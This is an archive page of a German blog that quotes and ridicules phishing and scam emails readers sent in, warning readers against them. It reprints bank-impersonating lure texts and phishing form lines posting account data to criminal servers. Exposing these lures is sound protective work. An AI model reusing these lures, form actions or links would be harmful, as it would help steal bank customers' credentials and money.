Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.

Kategoriearchiv „Leserpost“

Stagefright-Virus bedroht ihr Konto

Dienstag, 11. August 2015

Das Wichtigste vorab: Diese E-Mail kommt nicht von der Postbank. Es ist Phishing und der Versuch, ihnen einen Trojaner unterzujubeln. Löschen sie diese E-Mail! Wenn sie das mir als „irgendeinem dahergelaufenen Blogger“ nicht glauben wollen (was durchaus vernünftig ist, denn sie kennen mich nicht und ich kann ein beliebiger Vollidiot sein), überzeugen sie sich davon, indem sie kostenlos bei der Postbank-Hotline für Sicherheitsfragen unter der Telefonnummer 0800 1008906 anrufen und dort noch einmal nachfragen! Und nachdem sie dort die Bestätigung gehört haben, löschen sie diese Spam! Die Postbank versendet solche E-Mails nicht. Kommen sie auf gar keinen Fall auf die Idee, wegen einer E-Mail einer Bank irgendwelche Daten irgendwo einzugeben! Egal, was der Grund dafür sein soll! Es ist eine sehr schlechte Idee, die sie viel Geld kosten kann und ihnen monatelangen Ärger aller Art einbringen kann. Und wenn sie schon die Hotline anrufen, stellen sie dort auch gleich die Frage, warum vor dieser sehr gefährlichen laufenden Betrugsnummer noch nicht prominent auf der Kundenwebsite der Postbank gewarnt wird, denn zurzeit scheint bei der Postbank noch niemand auf diese naheliegende Idee gekommen zu sein – obwohl dort ansonsten geradezu vorbildlich auf gängige Betrugsmaschen hingewiesen wird. Eine prominent platzierte Warnung könnte so viel Schaden verhindern und kostet dabei so wenig Aufwand…

So, jetzt aber…

Es war ja klar, dass die Spammer darauf aufspringen würden. Wer auch nur eine Spur Verantwortung fühlt, wird allerdings niemals auf die Idee gekommen sein, seine Kontoführung mit einem Wischofon¹ zu machen – denn in diesen werksseitig funktionslimitierten Computern für Dumme verbindet sich die Security-Blauäugigkeit der Neunziger Jahre mit der technisch kompetenten organisierten Kriminalität der Zehner Jahre.

Tja, und wer seine Kontoführung nicht mit so einem gefährlichen Spielzeugtelefon macht, der lacht schon beim Anblick des Betreffs, lehnt sich zurück und hat eine Möglichkeit weniger, mit derart plumpen Nummern überrumpelt zu werden.

Diese Spam habe ich übrigens nicht selbst empfangen, sie wurde mir von einem Freund mit Konto bei der Postbank zugesteckt, der schon wegen des…

Von: „Postbank.de“ <do-not-reply@postbank.de>

…in der Spam angegebenen Absenders verunsichert war, ob sie nicht echt sein könnte. Ich hoffe, er hat sich jetzt für alle Zeiten gemerkt, das der Absender einer E-Mail ohne Aufwand gefälscht werden kann und somit gar nichts über die Herkunft einer E-Mail sagt. Was Banken tun können, um solche Verunsicherungen bei Empfängern von kriminellen Phishing-Spams zu verhindern, habe ich schon vor vier Jahren geschrieben und werde es hier nicht wiederholen. Dass die meisten Banken immer noch nichts tun, ist ein Beleg dafür, dass ihnen ihre Kunden egal sind und dass sie sich nicht daran stören, wenn Kriminelle das Geld ihrer Kunden für dicke Autos, Kokain und Prostituierte ausgeben können. Als Kunde einer solchen Bank würde ich die darin ausgedrückte Verachtung in vollem Umfang zurückgeben und mir einen seriöseren Dienstleister für meine Geldsachen suchen.

Sehr geehrte/r Kunde,

Weder kennt diese „Postbank“ den Namen des Empfängers, noch macht sie eine Angabe, auf welches Konto sich diese Mail bezieht². Spätestens an dieser Stelle sollte jedem Empfänger klar sein, dass es sich um eine Spam handelt.

Die Postbank Sicherheitszentrale [sic! Deppen Leer Zeichen] warnt vor einer Sicherheitslücke beim Smartphone-Betriebssystem Android von Google. Hacker könnten die Daten einfach per MMS stehlen [sic!] und ihr Handy karpern. Der Virus schleicht sich von alleine in ihr System [sic! Komma fehlt.] ohne dass Sie es bemerken.

Ich gehe darauf inhaltlich nicht weiter ein, außer vielleicht diese eine Kleinigkeit: Es geht bei Stagefright nicht um „Daten per MMS stehlen“, sondern um „beliebigen Code in eine MMS (oder ein irgendwie, zum Beispiel bei einem Hangout, vom Wischofon verarbeitetes Video) einbetten und unbemerkt ausführen“. Der „Postbank Sicherheitszentale“ aus der wirren Kopfwelt dieser Spammer scheint das nicht so völlig klar zu sein, und offenbar setzen die Kriminellen auch darauf…

Einen ausführlichen Bericht über den Stagefright Virus finden sie auf Hier [sic!]

…dass ihre Opfer mit dem verlinkten Artikel auf Zeit Online intellektuell überfordert sind. Das sind ja immerhin Buchstaben, die Text formen, der gelesen werden will – und übrigens recht unklar ist, da er mutmaßlich von einem Journalisten ohne vertiefte technische Kenntnisse verfasst wurde. Eine etwas klarere Darlegung gibt es bei Heise Online.

So schützt die Postbank Sie!

1. Wenn Sie im Besitz einen Android-Handys dann folgen Sie bitte den Anweisungen!

Aha, die „Postbank“ schützt mich, indem ich den Anweisungen folge. Vielleicht sollten die „Sicherheitsexperten“ dort mal einen Deutschexperten einstellen, damit die Formulierungen nicht so mies klingen… 😀

2. Klicken Sie „hier“ oder öffnen Sie die Datei in ihrem E-Mail Anhang!

Ein Klick auf „Click here“ in einer digital unsignierten Mail eines Unbekannten ist immer ein ganz besonders großer Beitrag zur Computersicherheit… :mrgreen:

3. Füllen Sie alle Daten aus und bestätigen Sie auf „Daten absenden“

Ich denke, die „Postbank“ will mich schützen. Stattdessen soll ich einen Anhang öffnen und ausfüllen. Dieser Anhang ist übrigens eine HTML-Datei. Wer Interesse daran hat: den Quelltext habe ich bei Pastebin hochgeladen. Das Wichtigste steht in Zeile 110, ich habe hier mal den interessanten Teil isoliert:

<form ... action="http://b.adress-datenabgleich.com/postbank_check.php" ...>

Die eingegebenen Daten gehen nicht an einen Server in der Domain der Postbank, sondern über die obskure und vor ein paar Tagen anonym registrierte Domain adress (strich) datenabgleich (punkt) com an einen von Verbrechern kontrollierten Server, der zu diesem Zeitpunkt erfreulicherweise schon vom Internet genommen wurde. (Ein Dank an den Hoster für die schnelle Reaktion! Aber es kann ja auch nicht jeder so langsam wie die Postbank sein, wenn millionenfacher Betrug durchgeführt wird…)

Welche Daten das sind? Diese Daten hier:

Screenshot des Anhanges mit einer Phishing-Seite im Design der Postbank. Unter der Überschrift 'Postbank Stagefright Virus entfernen' soll die E-Mail-Adresse, die Kontonummer und ein Passwort oder eine PIN eingegeben werden.

Wer den Verbrechern so Zugriff auf das Postbank-Konto gegeben hat und ihnen bestätigt hat, unter welcher Adresse die Spam ankommt und beklickt wird, darf sich schon „freuen“:

Screenshot des zweiten Schrittes der Phishing-Seite. Text: Weiteres vorgehen [sic!] -- Wir senden ihnen umgehend eine E-Mail mit einer Software, mit der Sie den Stagefright-Virus entfernen können. -- Gehen Sie Schritt für Schritt nach unserer Anleitung vor und entfernen sie den Stagefright-Virus. -- Sollten Sie nicht wie vorgeschrieben den Stagefright-Virus entfernen und ein Schaden ensteht [sic!], ist die Postbank nicht verpflichtet den Schaden zu erstatten.

Der nigelnagelneue Trojaner, den garantiert noch kein Antivirus-Schlangenöl kennt, wird gleich hinterhergeliefert.

Wir senden ihnen umgehend eine E-Mail mit einer Software mit der Sie den Stagefright-Virus entfernen können.

Die allerdings sehr naheliegende Frage, warum die „Postbank“ nicht gleich jedem ihrer angemailten Kunden eine E-Mail mit einer derartigen Software zusenden sollte, die beantwortet der freundliche Phisher und Cracker nicht.

Übrigens ist „Stagefright“ kein Virus, außer vielleicht in einem eher skurillen Sinn des Wortes. Es ist eine schwere, auf vielerlei Wegen ausbeutbare Sicherheitslücke in Android.

Mit freundlichen Grüßen
Ihre Sabine Heinel
Postbank Newsletter-Redaktion

Wenn das die Freundlichkeit ist, will man den Hass nicht mehr kennenlernen.

¹Wischofon ist mein deutsches Wort für das Reklamewort „smart phone“. Es bezeichnet den Gegenstand nach der Tätigkeit, die am häufigsten auf ihn ausgeführt wird: Wischen mit den Fingern. Ich meine das nicht als Schimpfwort.

²Es ist gar nicht selten, dass jemand mehrere Konten hat.

Wichtig: Datenspeicherung

Donnerstag, 16. Juli 2015

Diese E-Mail mit dem gefälschten Absender service (at) paypal (punkt) com kommt natürlich nicht von PayPal, sondern von Kriminellen – und darin ist eine sehr originelle Phishing-Masche, von der ich erwarte, sie in den nächsten Tagen noch häufiger zu sehen:

Screenshot der Phishing-Spam -- PayPal -- E-Mail Adresse (unkenntlich gemacht), Datum 15. Juli 2015 -- Wichtiger Hinweis zur Datenspeicherung -- Guten Tag (Name unkenntlich gemacht), Wie Sie bereits wissen, wurde die Vorratsdatenspeicherung per Gesetz verabschiedet und auch wir sind gezwungen zu handeln. Durch diese Gesetzesänderung werden Sie nun aufgefordert, Ihre bestehenden Daten zu bestätigen respektive zu aktualisieren! -- Zur Bestätigung

Die schwarzen Balken sind von mir. Die Spam kommt mit namentlicher Ansprache.

Natürlich ist die in der BRD eventuell demnächst geltende Vorratsdatenspeicherung völlig irrelevant für ein Unternehmen wie PayPal, das seinen Sitz in Luxemburg hat. Aber auch, wenn PayPal in der BRD ansässig wäre: Die Vorratsdatenspeicherung ist in diesem Zusammenhang eine idiotische Begründung für eine Dateneingabe. PayPal speichert sowieso die Kundendaten und die Geschäftsvorfälle, das ist auch erforderlich, um die Dienstleistung PayPals anbieten zu können, während das neue Menschenüberwachungsgesetz der Bundesrepublik Deutschland Anbieter von Kommunikationsdienstleistungen zu einer anlasslosen, vollständigen und betrieblich sinnlosen Überwachung ihrer Kunden verpflichtet.

Darüber hinaus sollte sich jeder PayPal-Kunde im Klaren sein, dass PayPal nach eigenen Angaben derartige E-Mails niemals an seine Kunden versendet:

Wir fordern Sie nie auf, persönliche Daten direkt auf einer Website einzugeben. Wenn wir Ihre Hilfe benötigen, fragen wir Sie immer über eine Nachricht in Ihrem PayPal-Konto

Mit diesem Wissen ist es eine Kleinigkeit, jede Phishing-Spam für PayPal-Kunden zu erkennen und direkt ins Tönnchen zu befördern. Auch, wenn sie originell formuliert ist, in überzeugendem Design kommt und eine namentliche Ansprache hat.

Die Regel lautet: Es kommt angeblich von „PayPal“, fordert mich auf, Daten herzugeben (zu „bestätigen“, zu „verifizieren“, „abzugleichen“ und vieler Unfug mehr) und enthält etwas zum Draufklicken, wo ich das tun soll? Das bedeutet, dass es sich um Phishing handelt.

Diese Spam ist ein Zustecksel meines Lesers E.T.

Targobank – Datenabgleich

Samstag, 4. Juli 2015

Aber ich bin da doch gar nicht Kunde. 😉

Absender: Targobank <direkt (at) targobank (punkt) de>

Dieser Absender ist gefälscht. (Jeder Absender in einer Spam ist gefälscht.) Diese E-Mail kommt nicht von der Targobank.

Screenshot der Darstellung der HTML-formatierten Spam in der Mailsoftware

Hui, Design!

Ich halte diese Phishing-Spam für gefährlich, weil sie überdurchschnittlich gut gemacht ist. Wer Kunde bei der Targobank ist und darauf reingefallen ist, sollte sich sofort mit der Bank in Verbindung setzen, um den Schaden zu minimieren.

Sehr geehrte Damen und Herren,

Genau mein Name! :mrgreen:

Eine richtige Bank würde ihre Kunden natürlich mit Namen ansprechen, und weil gar nicht so wenige Kunden mehrere Konten haben, würde sie auch noch erwähnen, auf welches Konto sich die Mail bezieht.

Ein Spammer kann im Allgemeinen – wenn er nicht aus einem Hack oder anderen Quellen eine Zuordnung von Mailadressen zu Bankdaten hat – nicht wissen, welche Kontonummer seine Empfänger haben. Ein vorsichtiger Umgang mit Bankdaten und die Verwendung einer eigenen E-Mail-Adresse ausschließlich für die Kommunikation mit der Bank sind ein wichtiger und sehr wirksamer Schutz gegen Phishing.

unser System hat festgestellt das Ihr Telefon-Banking PIN aus Sicherheitsgründen geändert werden muss.

Da bin ich aber froh, dass „euer System“ nicht festgestellt hat, dass ich ohne Grund 20.000 Øre berappen muss! :mrgreen:

Bitte nutzen das unten angefügte Formular um die Änderung Ihres Telefon-Banking PIN kostenfrei zu ändern.

Das „unten angefügte Formular“ ist eine an die Spam angehängte HTML-Datei, die im Browser so aussehen würde¹:

Screenshot der Darstellung des Anhangs der Targobank-Phishing-Mail in einem Webbrowser

Das Wichtigste daran ist, wo die eingegebenen Daten hingehen. Diese Frage beantwortet sich leicht durch einen Blick in den Quelltext der HTML-Datei:

<form [...] method="POST" action="http://a.dbbanking.ru/de/targo/login/targo.php"  >

Die Daten gehen also nicht zum Server der Targobank, sondern zum Server unter der von Kriminellen kontrollierten, russischen Domain a (punkt) dbbanking (punkt) ru. Das ist auch der Grund, weshalb man der „Targobank“ so viele Dinge sagen soll, die die richtige Targobank längst kennt, wenn man dort Kunde ist, zum Beispiel die eigene Kontonummer. Allein die hier angegebenen Daten reichen für die Übernahme des Kontos durch die Kriminellen, und ich bin mir sicher, dass nach dem Absenden noch weitere Daten für eine angebliche „Sicherheitsprüfung“ abgefragt werden – sehr beliebt sind wegen ihrer „vielseitigen kriminellen Verwendbarkeit“ Kreditkartendaten.

(Hinweis: Andernfalls belasten wir Ihr Konto mit 18,99€ und fordern die Änderung schriftlich über den Postweg bei Ihnen an.)

Damit ein Mensch auch so wirklich doof wird, darauf reinzufallen, wird er mit technokratischen Entgelt-Forderungen gefügig gemacht – so frei nach dem Motto: „Wir haben ein Sicherheitsproblem, zahlen sie bitte grundlos zwanzig Euro. Die Gebührentabelle, nach der wir dieses Geld erheben, haben wir uns einfach aus dem Hintern gezogen“.

Es handelt sich übrigens um langsame Verbrecher:

Ihren Telefon-Banking PIN können sie hier, oder wie folgt ändern:

1. Öffnen Sie die Datei im Anhang Ihrer Email und wählen Sie „öffnen mit“ aus.
2. Füllen Sie alle vorgesehenden Felder aus und klicken dann auf „Daten absenden“..
3. Ihr Telefon-Banking PIN aktiviert sich nach 5-7 Werktagen.

Die brauchen fast eine Woche, bis sie alles aus dem Konto rausgeholt haben, was sie rausholen wollen.

Für weitere Fragen ist unser Online Support unter: direkt (strich) pin (at) targobank (punkt) de 24Std. für Sie erreichbar.

Was, die sind nur 24 Stunden erreichbar? Und wenn die Frage einen Tag später kommt, hat man eben Pech gehabt? Tja, so etwas kommt raus, wenn die Phisher in Sprachen schreiben, deren Subtilitäten sie nicht verstehen. Ein Autor, der Deutsch kann, hätte „rund um die Uhr“ geschrieben und nicht das irreführende Ergebnis aus einer Computerübersetzung verwendet.

Es ist wieder einmal wie so oft bei den Phishing-Spams: Wenn der eigentliche Phishing-Kram formuliert ist, werden die Spammer oft ein wenig nachlässig und ihnen passieren kleine und zuweilen auch große und sehr peinliche Fehler. Wer sich nicht in Panik versetzen lässt (Sicherheitsmaßnahme der Bank, das wird teuer, wenn ich nicht reagiere) und gründlich liest, wird beinahe jede Phishing-Spam an solchen Details erkennen.

Targobank AG & Co. KG
Kasernenstr. 10
40213 Düsseldorf

Ihre Targobank

Wer es jetzt immer noch nicht bemerkt hat: Die Targobank hat mit dieser Spam nichts zu tun. Es ist eine Mail von Verbrechern, die ihre kriminellen Geschäfte mit fremden Konten machen wollen und die das Geld anderer Leute bei Koks und Nutten verprassen wollen.

Beratungstermin kostenlos unter:
info (at) targobank (punkt) de

Copyright © 2013 TARGOBANK

Oh, eine Mail von 2013 diente den Spammern als Vorlage… 😉

¹Ich rate strikt davon ab, Anhänge aus Spams zu öffnen, wenn man nicht weiß, wie man ein gut gesichertes System herstellt. Ein Virenscanner und eine „personal firewall“ machen kein gut gesichertes System. Das bisschen befriedigte Neugierde ist den möglichen Ärger niemals wert.

Diese Spam ist ein Zustecksel meines Lesers M.S.

Amazon Konto Verifikation!

Freitag, 5. Juni 2015

Diese Mail fällt nicht nur wegen ihres doofen Betreffs auf, sondern auch dadurch, dass 461 Mailadressen als Empfänger eingetragen sind, was natürlich den gewünschten Eindruck von „Amazon schreibt mich an, weils ein Problem mit meinem Account gibt“ zerstört. Die tiefere Bedeutung der Header-Zeile BCC muss sich der Spammer noch einmal von einem Achtjährigen erklären lassen.

Der Text ist dann auch genau so doof, wie es diese Mail schon auf dem ersten Blick verspricht:

Hallo lieber Amazon User ,
Sie müssen eine Verifikation Durchführen , weil leider alle Amazon
Daten Verloren Gingen.
Wir bitten sie auf der Angegebenen Webseite ( Siehe Unten ) , Den Link
zu öffnen , und sich dort einzuloggen und ihre daten erneut ein zu
geben.

Der Link zur Verifikation:
http://amzn.co.at/index/?[ID entfernt]

Mit Freundlichen Grüßen,
Ihr Amazon CO Team.

So so, leider sind alle Amazon-Daten verlorengegangen… 😀

Gut, dass darauf niemand reinfallen kann, weil es so krachend dumm ist!

Die verlinkte Website „verzichtet“ auf normales HTML und erzeugt ihre „Inhalte“ aus mit Javascript entschlüsselten, zuvor verschlüsselten Daten. 😯

Das ist natürlich ein bisschen… verdächtig, denn ein Phisher brauchte sich niemals solche Mühe zu geben. Mit an Sicherheit grenzender Wahrscheinlichkeit handelt es sich hier um einen Versuch, dem Besucher Schadsoftware zu installieren. Ich bin gerade viel zu unmotiviert, die vorsätzlich kryptischen Methoden zu analysieren, um nachzuschauen, was genau getan wird und ob es am Ende wenigstens zum Schein noch eine Phishing-Seite gibt und begnüge mich mit der Einsicht, dass dumm formulierte und technisch mies gemachte Phishing-Spams zurzeit manchmal auf perfide ausgearbeitete und wahrscheinlich hochinfektiöse Seiten führen. Oder: Auch den scheinbar dümmsten Spammer darf man nie unterschätzen.

Und deshalb klickt man niemals, niemals, niemals in eine Spam – und erlaubt auch generell nicht jeder dahergelaufenen Website die Ausführung von Javascript-Code im Browser. Ein Browser-Addon wie NoScript ist eine unverzichtbare Sicherheitssoftware, die derartige Angriffe an der Wurzel verhindert, selbst, wenn die Schadsoftware so aktuell sein sollte, dass der Virenscanner keine Chance hätte.

Diese Spam aus dem Beklopptenbrutschrank des Internet ist ein Zustecksel meines Lesers E.T.

Hallo Schatz.

Donnerstag, 21. Mai 2015

Hallo Schatz.
Kompliment des Tages, ich hoffe, Sie sind dort drüben geht es gut, ich werde mich gerne bei Ihnen vorstellen, mein Name ist Rebecca Edmond Einzel
nie zu heiraten, denn es ist mir eine Freude, Sie schreiben, ich liebe es mich wirklich interessieren, in qui MIT Kommunikation / Freundschaft mit Ihnen, wenn Sie-haben den Wunsch mit mir, bitte ich werde wie Sie, um mich wieder mit diesem Kontakt
meine Email-Adresse, so Abebooks Bahn kennen zu lernen einander besser, teilen unsere Gefühle und Ideen. Ich werde mich sehr freuen, wenn Sie mich durch meine E-Mail für die Kommunikation Einfachste schreiben
und um Ihnen mehr über mich erzählen und Ihnen meine Bilder, werde ich
die darauf warten, von Ihnen zu hören, Dank und einen schönen Tag,
dein neuer Freund.
Rebecca Edmond.

Ohne Worte.

Diese Spam, deren Sprache mindestens sieben Schwitt auf der nach oben offenen Dada-Skala erreicht, ist ein Zustecksel meines Lesers R.R.F.

Jüngste Provisionszahlung: 14.479€

Dienstag, 21. April 2015

Oh, alles für mich?!

Hallo,

Genau mein Name. Und, um was geht es?

Dies ist eine Beschreibung einer aktuellen Auftrag, eines unserer Mitglieder zu zahlen:

5. März 2015 02.39.31 EST
Transaction ID: 9DS42319C81228351

Aha, um eine Zeitangabe aus einer fernen Zeitzone und eine fröhliche Folge von Ziffern und Buchstaben. Alles für Hallo. Und für eine wehrlose Mailadresse.

Und, um was geht es dabei?

Sie haben geschickt ein automatisches Zahlung direkt worden auf Ihre Provisionen zu berücksichtigen. Hier sind die Details:

Betrag: € 14,479.00 USD
Um Provisions Konto
Für: Commissions (22.02 – 01.03)
Automatische Zahlungsnummer : 1W4G32PFH1
Zahlungsweise: Wöchentlich
Nächste Fälligkeit: 8. März 2015

Der Absender dieser Mail, der offenbar in internationalen „Geschäften“ macht, überweist nicht nur Provisionen an Unbekannte, sondern ist auch noch sehr wirtschaftlich und hat sich die paar Euro zwanzig für einen richtigen Dolmetscher gespart, so dass auch nach dreimaligen Lesen nicht klar wird, was er mit seinen „geschäftlichen“ Texten überhaupt sagen will.

Wer würde bei so einem Müll nicht sofort…

=> Jetzt anmelden, um zu starten erhalten Ihre Provisionen!

…klicki klicki auf das Linki klicki? Natürlich über ein Skript, dem man eine eindeutige ID übermittelt und das dann auf die eigentliche Site weiterleitet, so dass die Spammer auch wissen, welche Empfänger in der Spam herumklicken. Was man in einer Spam derartiger Betrüger nur noch selten sieht, ist ein direkter Link.

Und nachdem mit nichtssagendem Text der Link untergebracht wurde, steht der Spammer nur noch vor einer Herausforderung: Den Unsinn mit einer halbwegs glaubwürdigen und nicht unmittelbar lächerlichen Grußformel abzuschließen:

Danke,

– Unterstützung

Auch daran ist der Spammer gescheitert.

Diese Spam aus der alltäglichen Hölle im Postfach ist ein Zustecksel meines Lesers R.R.F.

Grüß Gott

Freitag, 20. März 2015

Aber gern doch. Hallo Gott, ich soll dich ganz lieb vom Spammer grüßen! Mach bitte schon mal die Hölle für den Typen ein bisschen warm!

Grüß Gott

Wie jetzt? Nochmal? Ist der schwerhörig geworden.

Holen Sie sich ein Darlehen heute von Loan-Engine, mit Zinssatz von 3%. füllen Die folgende Tabelle bei Interesse:

Aber zugegeben: Wer an Darlehnsmotoren mit ganz geringem Zinsverbrauch glaubt, von denen man nur in der Spam lesen kann, der trägt nicht nur lebensfroh die Grüße an seinen unsichtbaren Begleiter weiter, sondern sagt auch gern mal in einem unverschlüsselten Mailverkehr mit Unbekannten ein paar Dinge über sich.

Geschlecht:
Land:
Verbrauch:
Dauer:
Mission:

Zum Beispiel, welches Geschlecht und welchen Verbrauch [!] er hat. Das ist viel wichtiger als so ein Name, eine Anschrift und eine Angabe, welches Einkommen man hat. Vor allem bei der Beantragung eines Darlehens.

Es gibt viele Gründe, warum ein Darlehen können helfen

Und es gibt wenig Gründe, warum einem kriminellen Spammer sollten vertrauen. Vor allem dann nicht, wenns um Geld geht. (Und wer trotzdem drauf reingefallen ist, der sollte wenigstens diesem ganz großen Spezialbanker ohne Bankkonto niemals, niemals, niemals irgendwelche Vorleistungen anonym über MoneyGram und Western Union zusenden, denn die sind hinterher weg. Für nichts.)

Gruß

Ana Paula

Winkewinke zurück
Dein Gottesgrüßer

Diese in leicht wundersamem Deutsch geschriebene Qualitätsspam ist ein Zustecksel meines Lesers R.R.F.

Heißer Trading Bot enthüllt! [JETZT HERUNTERLADEN!]

Donnerstag, 12. März 2015

Richtig heiß. Die ersten sollen sich schon die Flossen dran verbrannt haben.

Keine Zeit für lange Erklärungen…

Öffnen Sie diesen Link!

> Clicken Sie hier

Das Mailpapier ist voll. Ich erkläre nichts. Klick einfach auf „Click here“, dem dümmsten Linktext, den Werber und Spammer benutzen¹.

und laden Sie sich den Trading Roboter von Trading Professor George S. herunter!

Da gibts tolle Software von einem tollen Professor, der seinen Nachnamen aus lauter Scham lieber abkürzt. Was unterrichtet dieser Professor? „Trading“ unterrichtet er. In der bizarren Hirnwelt eines Spammers kann man nämlich „Trading“ studieren.

Hey, und Software, die in illegaler Weise über Spam verbreitet wird, ist ja immer etwas ganz tolles. So etwas will sich ja jeder auf seinen Rechner aufspielen.

Es ist die gleiche Software, die er seinen Kunden sonst für 3.600,- USD verkauft!

Vor allem, wenn es jetzt statt behaupteter 3,6 Kilodollar nur noch gar nichts kostet.

Heute erhalten Sie eine kostenlose Kopie, die uns während des Betatests zugespielt wurde!

Und warum nicht? Na, weil es eine Betaversion ist, die noch gar nicht richtig fertig ist und noch gar nicht richtig funktioniert. Genau die richtige Version, um auf Grundlage der Programmausgaben dieser Software irgendwelche hochspekulativen Wettzettel der Marke „Binäre Option“ an der Börse zu kaufen und damit den Kurs so zu manipulieren, wie es die kriminellen Verbreiter dieser tollen Software gern hätten. Es geht ja nur um Geld, wer will da schon gereifte, fehlerfreie und bewährte Software benutzen. Fürwahr, der Hirni, der diese Spam geschrieben hat, der ist ein ganz Großer! :mrgreen:

Sie hören richtig! Völlig kostenlos während andere 3.600 USD für diesen Trading Roboter zahlen!

Und er richtet sich an Leute, die ihre Mail hören!

Offenbar handelt es sich also um ein Produkt für Blinde.

Erhalten Sie Ihre kostenlose Version hier:

Eingebettetes Bild in der Spam, das in einer Tabelle zeigt, wie aus jedem Börsengeschäft ein Gewinn geworden ist

> Clicken Sie hier

Und jetzt schnell einen Screenshot von der Tabellenkalkulation machen, damit es so aussieht, als würde jedes Geschäft ein Gewinn, und danach noch einmal den dümmsten Linktext aus Spam und Reklame.

Die naheliegende Frage, warum dieser vergeblich um Freundlichkeit bemühte und mehr als nur etwas dümmlich schreibende Reichwerdexperte nicht einfach mit seiner tollen und kostenlosen Software von namenlosen Trading-Professoren reich wird und stattdessen die Postfächer der Menschen mit illegaler und asozialer Spam zuspachtelt, beantwortet sich nach kurzer Hirnbenutzung. Hier werden unerfahrene Leute gesucht, die man dazu bringen kann, bei gewissen sehr spekulativen Wettzetteln mit ihrem Kauf- und Verkaufsverhalten den Kurs zu manipulieren, um damit dicke Geschäfte zu machen. Übrigens verschwindet oder entsteht das Geld an der Börse nicht, es gehört hinterher nur jemanden anders oder gehörte vorher jemanden anders. Wer so etwas mitmacht, kann nur verlieren. Der Rest ist Lüge. Aber das sieht man ja schon an der Tatsache, dass es durch Spam verbreitet wird.

Danken Sie mir einfach später denn Sie werden es keinesfalls bereuen!

Und nicht vergessen: Diesem Spammer ist man einen Dank schuldig. Er heißt übrigens…

Ihr Support Team!

…Support Team. Jemanden, der von seiner Mutter einen so scheußlichen Vor- und Nachnamen bekommen hat, kann man gar nicht genug bedauern. Kein Wunder, das man mit einer solchen Belastung auf die schiefe Bahn gerät.

Unsubscribe me from this list

Du kannst mich auch mal!

¹Eine Regel, die jede Mail mit „Click here“ automatisch ins Glibbersieb sortiert, macht niemals etwas falsch – denn nur die dümmsten und unseriöstesten Werber nutzen neben kriminellen Spammern diese sinnlos stammelnde Phrase. Wieso sinnlos? Tja, es hat schon immer Software für E-Mail gegeben, bei der man nicht geklickt hat – ich selbst habe lange einen textbasierten Mailer an der Konsole genommen, der HTML-Mails mit Lynx gerendert hat – und im Moment sollen ja auch ziemlich viele Leute ihr Internetzeug mit Tablets und Smartphones machen. Was wäre der richtige Spruch dafür? „Grabschen sie hier“? Klingt doof? Genau so doof klingt „Click here“.

Diese Spam ist ein Zustecksel meines Lesers R.R.F.

Close

⚠️ Kein Adblocker erkannt 🛑

Bitte installieren Sie so schnell wie möglich einen Adblocker für ihren Webbrowser! Sie schützen damit die Ihren Computer vor Schadsoftware, die über Malvertising verteilt wird, und Sie schützen sich selbst vor Ausspähung und intransparentem Datenhandel durch halbseiden bis grenzkriminell vorgehende Wirtschaftsunternehmen. Das ist Grund genug, einen Adblocker zu verwenden. Aber gleichzeitig machen Sie auch Ihre gesamte Interneterfahrung schöner, erfreulicher und schneller. Ich empfehle uBlock Origin.